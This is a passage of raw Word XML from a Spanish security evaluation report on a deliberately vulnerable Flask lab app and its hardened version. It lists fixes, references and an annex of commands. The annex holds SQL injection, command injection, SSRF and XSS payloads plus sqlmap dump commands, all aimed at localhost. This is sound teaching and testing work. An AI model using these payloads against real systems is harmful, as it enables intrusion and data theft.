        <w:br w:type="page"/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8. Conclusiones y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La V1, construida deliberadamente insegura, permite observar en codigo real el funcionamiento de las principales vulnerabilidades de OWASP Top 10 2021 y su explotacion con herramientas como sqlmap. La V2 bloquea cada uno de estos ataques (18/18 probes, 59/59 tests), lo que demuestra que las correcciones son verificables y efectivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8.1 Recomendaciones priorizadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P1 (inmediato): parametrizar todas las consultas SQL (VUL-01/02); eliminar subprocess con shell=True (VUL-03); hashear passwords con bcrypt y secret por variable de entorno (VUL-09); aplicar RBAC real en backend (VUL-07).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P1 (inmediato): desactivar debug en produccion y activar paginas de error sin trazas (VUL-11); actualizar Werkzeug &gt;= 3.0.3 (VUL-10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P2 (corto plazo): validar subidas por extension/MIME/magic bytes y guardar fuera del webroot (VUL-04/06); bloquear IPs privadas y redirecciones en /importar (VUL-05); deletes por POST + CSRF (VUL-08).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P2 (corto plazo): aplicar rate limiting y lockout de cuenta (VUL-12); registrar eventos de seguridad en un log de auditoria (VUL-13).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P3 (medio plazo): integrar SAST (Bandit) y SCA (Safety) en el pipeline y mantener el corpus de tests automatizados de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8.2 Trabajo futuro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ejecutar el flujo de forja de cookie de sesion con itsdangerous usando el secret_key conocido de la V1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automatizar el escaneo de puertos internos via SSRF ciego contra la red Docker "lab".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evaluar con un escaner activo (OWASP ZAP / Burp) la V2 y comparar con los hallazgos de esta guia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Extender la evaluacion a un esquema de certificado real (Let's Encrypt) para el despliegue de produccion.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9. Referencias normativas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ISO/IEC 15408-1:2022. Information security, cybersecurity and privacy protection - Evaluation criteria for IT security - Part 1: Introduction and general model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ISO/IEC 15408-2:2022. Part 2: Security functional components (SFR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ISO/IEC 15408-3:2022. Part 3: Security assurance components (SAR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ISO/IEC 18045:2022. Methodology for IT security evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ISO/IEC 15446:2017. Guide for the production of Protection Profiles and Security Targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP. (2021). OWASP Top Ten 2021. https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP. (2023). Web Security Testing Guide (WSTG). https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MITRE. CWE - Common Weakness Enumeration. https://cwe.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>NIST. (2024). CVE-2024-34069 (Werkzeug). https://nvd.nist.gov/vuln/detail/CVE-2024-34069</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IETF. (2018). RFC 8446 - The Transport Layer Security (TLS) Protocol Version 1.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP. (2023). SQL Injection Prevention Cheat Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP. (2023). Cross-Site Scripting Prevention Cheat Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP. (2023). File Upload Cheat Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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Anexo A. Comandos utilizados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comandos de la evaluacion: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Despliegue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docker compose up -d                 # v1:5001 + v2/nginx:443 (sqlmap on-demand)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SQLi manual (V1)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curl -s -X POST http://localhost:5001/login -d "username=admin' OR '1'='1' --&amp;password=x"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curl -s "http://localhost:5001/estudiantes?buscar=' OR 1=1 --"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SQLi automatizado (V1) - sqlmap 1.10.7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sqlmap -u "http://localhost:5001/estudiantes?buscar=test" --cookie="session=..." \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 xml:space="preserve">  --technique=U --level=2 --risk=2 -T usuarios --dump --output-dir=docs/sqlmap_evidence/estudiantes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docker compose run --rm sqlmap -u "http://v1:5001/login" \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 xml:space="preserve">  --data="username=admin&amp;password=x" --batch --dump -T usuarios --output-dir=/out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RCE (V1)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curl -b cookies.txt --data-urlencode "host=127.0.0.1 &amp; whoami" http://localhost:5001/diagnostico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SSRF (V1)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curl -b cookies.txt --data-urlencode "estudiante_id=1" \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 xml:space="preserve">  --data-urlencode "url=http://127.0.0.1:5001/login" http://localhost:5001/estudiantes/importar-foto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XSS (V1) - vector observaciones con |safe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curl -b cookies.txt --data-urlencode "observaciones=&lt;script&gt;alert(1)&lt;/script&gt;" http://localhost:5001/notas/crear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Verificacion V2 (18/18 PASS)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powershell -ExecutionPolicy Bypass -File .\scripts\verificar_v2.ps1 -Brute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# Tests de seguridad V2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pytest -q   # 59/59 passing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Toda la evidencia de esta evaluacion se conserva en el repositorio bajo docs/sqlmap_evidence/ (dump CSV, logs y target de sqlmap) y en las guias docs/PENTEST.md, docs/SQLMAP_ATTACK.md y v1/docs/PENTEST.md.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